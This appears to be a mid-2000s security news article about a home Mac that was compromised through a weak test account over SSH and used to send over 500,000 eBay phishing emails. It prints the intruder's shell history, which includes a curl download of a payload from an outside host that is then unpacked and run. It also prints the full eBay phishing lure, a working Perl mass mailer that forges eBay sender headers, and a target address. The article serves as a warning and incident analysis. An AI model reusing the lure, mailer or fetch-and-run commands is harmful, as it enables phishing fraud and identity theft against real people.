About | ACP | Buy | Forum | Industry Watch | Learning Curve | Search | Twitter | Xnews
Home » Industry Watch

Phishing Tales Can Come True

It can happen to you.


1. MacInTouch Notes and Tips

Dave Villeneuve sent the most instructive email we've seen in a long time.

Much to my horror, I awoke on the weekend to an e-mail from my service provider which started with:


'Recently we have had complaints of spam coming from your connection.'

My wife had complained last week that the computer at home had seemed a bit slow. I rebooted it, and it seemed fine immediately afterwards.

Now I took immediate action, sent an email indicating it was unintentional and I'd take care of it immediately. I pulled the network cable and proceeded to see what had happened.

In a nutshell, about a year ago I'd played around with fast user switching. I'd created an account with the userid of 'lisa' and a password of 'lisa'. Ok, not too swift, but it was convenient for a test. I'd forgotten about it. When I looked in the account's .bash_history file, I found stuff like:


curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd

So clearly the person had logged into this not secure, yet still non-admin account and was running scripts. Likely they had gotten in via ssh, since I had the port open so I could do remote maintenance from my office if the need arose.

Checking the /var/log/mail.log (one of the archives), I found that on October 30th it had sent out over 500,000 eBay spam messages.

Just a warning... Make sure you use secure/difficult to guess passwords, ie don't use 'guest guest', or name name userid/password pairs.

Mac OS X is very secure, but not if you leave the doors unlocked and the keys in the ignition.

2. msg.txt

eBay request: Please follow the Member Verification Procedure (Second Notice)

Dear eBay Member,

Due to recent account takeovers and unauthorized listings, eBay is introducing a new account verification method. From time to time, randomly selected accounts (seller and/or buyer) are subjected to an advanced verification process based on our merchant accounts/bank relations and customers credit card. eBay may also request in an email message scanned/faxed copies of one or more photo ID's. Your account confirmation may go wrong if your credit card/bank account is expired, or if you have changed your credit card number, billing address etc. without letting us know about the change.
Subject of this verification process are also the accounts that have unpaid dues to eBay.
Your account is not suspended, but if in 48 hours after you receive this message your account is not confirmed we reserve the right to suspend your eBay registration. If you received this notice and you are not the authorized account holder, please be aware that it is in violation of eBay policy to represent oneself as another eBay user. Such action may also be in violation of local, national, and/or international law. eBay is committed to assist law enforcement with any inquires related to attempts to misappropriate personal information with the intent to commit fraud or theft. Information will be provided at the request of law enforcement agencies to ensure that perpetrators are prosecuted to the full extent of the law.

Note: If this is the second time you receive this notice, it might be because you have made a mistake when you entered your details or that the account was not updated at all.


To confirm your identity with us click here:
http://signin.ebay.com/aw-cgi/eBayISAPI.dll?userconfirm&ssPageName=h:h:sin:US

We apologize in advance for any inconvenience this may cause you and we would like to thank you for your cooperation as we review this matter.



Respectfully,
Trust and Safety Department
eBay Inc.

http://www.ebay.com/


This eBay notice was sent to you based on your eBay account preferences. If you would like to review your notification preferences for other types of communications, click here. If you would like to receive this email in text only, click here.

As outlined in our User Agreement, eBay will periodically send you information about site changes and enhancements. Visit our Privacy Policy and User Agreement if you have any questions.

Copyright © 2005 eBay Inc. All Rights Reserved.
Designated trademarks and brands are the property of their respective owners.

eBay and the eBay logo are trademarks of eBay Inc.f

3. sendeb.pl

#!/usr/bin/perl

$SUBJ="IMPORTANT:Security Issues [Incident: 040921]";
$MSG="msg.txt";
$USERS="users";

open(IN,$USERS);

$id=12345;
while(chop($line=<IN>)){
open(SM,"|/usr/sbin/sendmail $line");
print(SM "To: $line\n");
print(SM "Subject: $SUBJ\n");
print(SM "Message-ID: <".time().".$id.qmail\@bankofamerica.com>\n");
print(SM "From: \"eBay Security Dept.\" <security\@ebay.com>\n");
print("Message sent to $line\n");
print(SM "Content-Type: text/html\n");
open(FILE,$MSG);
while($line=<FILE>){
    print(SM $line);
}
close(FILE);
close(SM);
$id++;
}

close(IN);

4. users

cleo_nav@yahoo.com

About | ACP | Buy | Forum | Industry Watch | Learning Curve | Search | Twitter | Xnews
Copyright © Rixstep. All rights reserved.